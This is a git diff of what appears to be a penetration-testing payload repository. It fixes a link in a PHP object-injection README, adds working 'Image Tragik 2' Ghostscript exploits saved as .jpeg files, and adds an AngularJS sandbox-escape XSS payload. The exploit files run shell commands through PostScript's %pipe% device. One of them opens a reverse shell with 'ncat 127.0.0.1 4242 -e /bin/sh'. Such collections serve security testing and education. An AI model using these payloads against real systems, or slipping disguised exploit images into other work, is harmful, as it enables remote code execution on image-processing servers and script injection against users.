diff --git a/PHP serialization/README.md b/PHP serialization/README.md index e897318..c237c46 100644 --- a/PHP serialization/README.md +++ b/PHP serialization/README.md @@ -2,7 +2,7 @@ PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope. -Also you should check the `Wrapper Phar://` in [File Inclusion - Path Traversal](github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#wrapper-phar) which use a PHP object injection. +Also you should check the `Wrapper Phar://` in [File Inclusion - Path Traversal](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#wrapper-phar) which use a PHP object injection. ## Exploit with the __wakeup in the unserialize function diff --git a/Upload insecure files/Image Tragik 2/README.md b/Upload insecure files/Image Tragik 2/README.md new file mode 100644 index 0000000..206fcf9 --- /dev/null +++ b/Upload insecure files/Image Tragik 2/README.md @@ -0,0 +1,22 @@ +# Image Tragik 2 + +## Exploit + +Simple `id` payload + +```powershell +%!PS +userdict /setpagedevice undef +save +legal +{ null restore } stopped { pop } if +{ legal } stopped { pop } if +restore +mark /OutputFile (%pipe%id) currentdevice putdeviceprops +``` + +then use `convert shellexec.jpeg whatever.gif` + +## Thanks to + +* [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2) \ No newline at end of file diff --git a/Upload insecure files/Image Tragik 2/centos_id.jpeg b/Upload insecure files/Image Tragik 2/centos_id.jpeg new file mode 100644 index 0000000..0c01c23 --- /dev/null +++ b/Upload insecure files/Image Tragik 2/centos_id.jpeg @@ -0,0 +1,6 @@ +%!PS +userdict /setpagedevice undef +legal +{ null restore } stopped { pop } if +legal +mark /OutputFile (%pipe%id) currentdevice putdeviceprops \ No newline at end of file diff --git a/Upload insecure files/Image Tragik 2/ubuntu_id.jpeg b/Upload insecure files/Image Tragik 2/ubuntu_id.jpeg new file mode 100644 index 0000000..e89b57d --- /dev/null +++ b/Upload insecure files/Image Tragik 2/ubuntu_id.jpeg @@ -0,0 +1,8 @@ +%!PS +userdict /setpagedevice undef +save +legal +{ null restore } stopped { pop } if +{ legal } stopped { pop } if +restore +mark /OutputFile (%pipe%id) currentdevice putdeviceprops \ No newline at end of file diff --git a/Upload insecure files/Image Tragik 2/ubuntu_shell.jpeg b/Upload insecure files/Image Tragik 2/ubuntu_shell.jpeg new file mode 100644 index 0000000..2aed538 --- /dev/null +++ b/Upload insecure files/Image Tragik 2/ubuntu_shell.jpeg @@ -0,0 +1,8 @@ +%!PS +userdict /setpagedevice undef +save +legal +{ null restore } stopped { pop } if +{ legal } stopped { pop } if +restore +mark /OutputFile (%pipe%ncat 127.0.0.1 4242 -e /bin/sh) currentdevice putdeviceprops diff --git a/XSS injection/XSS in Angular.md b/XSS injection/XSS in Angular.md index 84f9935..c627659 100644 --- a/XSS injection/XSS in Angular.md +++ b/XSS injection/XSS in Angular.md @@ -1,5 +1,13 @@ # XSS in Angular +Angular 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/1031534746084491265) + +```javascript +{{[].pop.constructor('alert\u00281\u0029')()}} +``` + +Example available at [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?a=%7B%7B[].pop.constructor%26%2340%27alert%5Cu00281%5Cu0029%27%26%2341%26%2340%26%2341%7D%7D) + Angular 1.6.0 ```javascript